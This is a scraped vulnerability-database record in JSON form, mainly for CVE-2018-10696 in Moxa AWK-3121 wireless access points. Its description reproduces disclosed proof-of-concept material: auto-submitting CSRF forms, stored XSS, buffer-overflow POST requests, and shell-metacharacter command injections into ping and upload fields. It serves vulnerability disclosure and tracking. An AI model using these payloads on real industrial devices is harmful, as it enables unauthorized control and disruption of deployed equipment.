"id": "CNVD-2016-10730"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-16-308-01"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/94092"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8363"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-8363"
},
{
"trust": 0.3,
"url": "http://www.moxa.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"date": "2017-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-97183"
},
{
"date": "2017-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"date": "2016-11-03T00:00:00",
"db": "BID",
"id": "94092"
},
{
"date": "2017-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"date": "2017-02-13T21:59:01.080000",
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"date": "2017-03-16T00:00:00",
"db": "VULHUB",
"id": "VHN-97183"
},
{
"date": "2017-03-16T00:00:00",
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"date": "2016-11-24T01:07:00",
"db": "BID",
"id": "94092"
},
{
"date": "2017-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"date": "2017-03-16T18:04:08.483000",
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Moxa OnCell Any on the server in series products OS Command execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
],
"trust": 0.6
}
}
VAR-201906-0786
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. Moxa AWK-3121 The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A cross-site request forgery vulnerability exists in Moxa AWK-3121 version 1.14. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization.
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0786",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10696"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10696",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10696",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120481",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10696",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10696",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-324",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120481",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10696",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. Moxa AWK-3121 The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A cross-site request forgery vulnerability exists in Moxa AWK-3121 version 1.14. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). However, the same functionality allows an attacker to download\n the file without any authentication or authorization. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n This allows an attacker who is able to execute a cross-site\n scripting attack to steal the cookie very easily. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker 